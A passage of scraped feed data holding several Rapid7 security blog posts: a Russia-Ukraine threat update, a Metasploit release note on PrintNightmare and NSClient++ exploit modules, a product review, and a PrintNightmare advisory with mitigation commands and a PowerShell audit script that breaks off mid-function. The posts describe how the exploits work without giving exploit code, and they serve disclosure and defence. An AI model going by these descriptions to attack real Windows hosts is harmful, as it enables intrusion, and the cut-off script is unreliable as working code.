Most recently, that includes:\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->):** Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents, as well as ransomware payments, to CISA. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>):** \u201c[E]specially in light of Russia\u2019s escalating actions inside of Ukraine,\u201d the FCC seeks comment on vulnerabilities threatening the Border Gateway Protocol (BGP), which is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it is aware of no specific, credible threat against the U.S. at this time. 
It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * **An Anonymous-affiliated hacking group claims to have hacked a branch of the Russian military and Rosatom, the Russian State Atomic Energy Corporation.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked the phone directory of the military prosecutor's office of Russia's southern military district, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * **A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_\n\n * **An Anonymous-associated hacktivist group took down the popular Russian news website lenta.ru**\n\nAs part of the OpRussia cyberattack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. 
As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T18:55:38", "description": "## PrintNightmare\n\n\n\nRapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), have added a new module for [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\\SYSTEM`.\n\nBecause Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.\n\n[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. 
For more information and a full timeline, see [Rapid7\u2019s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!\n\n## NSClient++\n\nGreat work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged Windows account to gain admin access on a Windows system and start a shell.\n\nFor this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature must be enabled. You must also know where the NSClient++ config file is, because the module reads the admin password, which is stored in clear text, from that file.\n\n## New module content (2)\n\n * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) \\- A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a remote code execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker-controlled DLL as the `SYSTEM` user.\n\n * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. 
The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and the `ExternalScripts` feature enabled, gains a SYSTEM shell.\n\n## Enhancements and features\n\n * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) \\- This updates how msfconsole's history file is handled. It adds a size limit so the number of stored commands does not grow indefinitely, and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).\n\n## Bugs fixed\n\n * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) \\- A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.\n * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `apport_abrt_chroot_priv_esc` module where the check method would fail if the `apport-cli` binary was not in the PATH.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)\n * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly 
Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-07-09T17:53:41", "type": "rapid7blog", "title": "Metasploit Wrap-up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T17:53:41", "id": "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "href": "https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first-generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. 
Simply click the **Export to PDF** button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting her organization's industry. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the Vulnerability Details page to a PDF, which allows her to share it and provide more details to interested team members, who can then help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares it in an e-mail to his team, stating that this asset seems to have been missed by their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. 
This integration is particularly helpful for organizations that scan container images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>),\u201d presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. 
More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in [Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. 
Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit 
CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier, [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. 
The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. 
Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." 
Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. 
See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds, and a patch remains unavailable at this time.\n\nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. We advise following one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that `RpcAddPrinterDriver` is not the only vulnerable function, and that the Win32 `AddPrinterDriverEx` function also works. Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. 
Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:**\n\nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a print server. Administrators can install either signed or unsigned printer drivers on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. 
As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users are treated as either administrators or non-administrators; delegated rights to install printer drivers are no longer honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. Dedicated print servers remain vulnerable if the spooler is not stopped. Microsoft's [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since Active Directory has no way to prune stale printer queue objects unless the spooler service is running on at least one domain controller in each site. 
However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd (stop the service, then keep it from starting again at boot):\n \n \n net stop spooler\n sc config spooler start= disabled\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts. The first searches the Admin log for the error the spooler records when it fails to load a malicious driver DLL; the second pulls event ID 316 (printer driver added or updated) from the Operational log, which is disabled by default and must be enabled before it records anything:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' -ErrorAction SilentlyContinue |\n     Where-Object { $_.Message -like '*The print spooler failed to load a plug-in module*' } |\n     Select-Object TimeCreated, Id, Message\n \n \n \n Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PrintService/Operational'; ID=316} -ErrorAction SilentlyContinue | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the registry values detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. The checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally verify that Point and Print has been disabled in customer environments. InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. 
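The host-level checks from the Mitigation Guidance section can be scripted. The PowerShell below is an added example written for this page, not code from the original Rapid7 post or from Microsoft. It audits a single machine against the KB5005010 registry values and the spooler state described above, flags the Authenticated Users group nested in local groups that can add printer drivers (the two group names used are an illustrative assumption, not the full list from Microsoft's advisory), and can apply the registry hardening. It does not verify that the July 6, 2021 update is installed; use a vulnerability scanner or `Get-HotFix` for that.

```powershell
# Added example (not part of the Rapid7 post): audit one host against the
# CVE-2021-34527 workarounds above and, on request, apply the KB5005010
# registry hardening. Run from an elevated Windows PowerShell 5.1 session.

$PointAndPrintKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

# Assumption: an illustrative subset of the local groups that may install
# printer drivers; replace with the full list from Microsoft's advisory.
$DriverInstallGroups = 'Administrators', 'Print Operators'

function Get-PolicyValue {
    param([string]$Name)
    # $null when the key or value is absent, which is the Windows default.
    if (-not (Test-Path -Path $PointAndPrintKey)) { return $null }
    $props = Get-ItemProperty -Path $PointAndPrintKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $props) { return $null }
    return [int]$props.$Name
}

function Test-PrintNightmareMitigation {
    # Returns a list of findings; an empty list means the host matches the guidance.
    $findings = [System.Collections.Generic.List[string]]::new()

    # Workaround A: spooler stopped and disabled. With the service down, the
    # MS-RPRN endpoint the exploit talks to is not exposed at all.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerRunning = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')
    if ($spoolerRunning) {
        $findings.Add('INFO: Print Spooler is running; the registry hardening below must be complete.')
    }

    # Workaround B: Point and Print restrictions per KB5005010.
    $install  = Get-PolicyValue 'NoWarningNoElevationOnInstall'
    $update   = Get-PolicyValue 'UpdatePromptSettings'
    $restrict = Get-PolicyValue 'RestrictDriverInstallationToAdministrators'

    if ($null -ne $install -and $install -ne 0) {
        $findings.Add("RISK: NoWarningNoElevationOnInstall = $install (must be 0 or absent).")
    }
    if ($null -ne $update -and $update -ne 0) {
        $findings.Add("RISK: UpdatePromptSettings = $update (must be 0 or absent).")
    }
    if (-not $restrict) {
        $findings.Add('RISK: RestrictDriverInstallationToAdministrators is 0 or absent; non-admins can add drivers.')
    }

    # Advisory criterion 2: Authenticated Users (S-1-5-11) nested in a group
    # that can add drivers. Get-LocalGroupMember does not exist on domain
    # controllers, so errors are ignored there.
    foreach ($group in $DriverInstallGroups) {
        $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue
        if ($members | Where-Object { $_.SID.Value -eq 'S-1-5-11' }) {
            $findings.Add("RISK: Authenticated Users is a member of local group '$group'.")
        }
    }
    return $findings
}

function Set-PrintNightmareHardening {
    # Applies steps 2 and 3 of the guidance above (registry only; the spooler
    # itself is left to Stop-Service / Set-Service as shown earlier).
    if (-not (Test-Path -Path $PointAndPrintKey)) {
        New-Item -Path $PointAndPrintKey -Force | Out-Null
    }
    $values = @{
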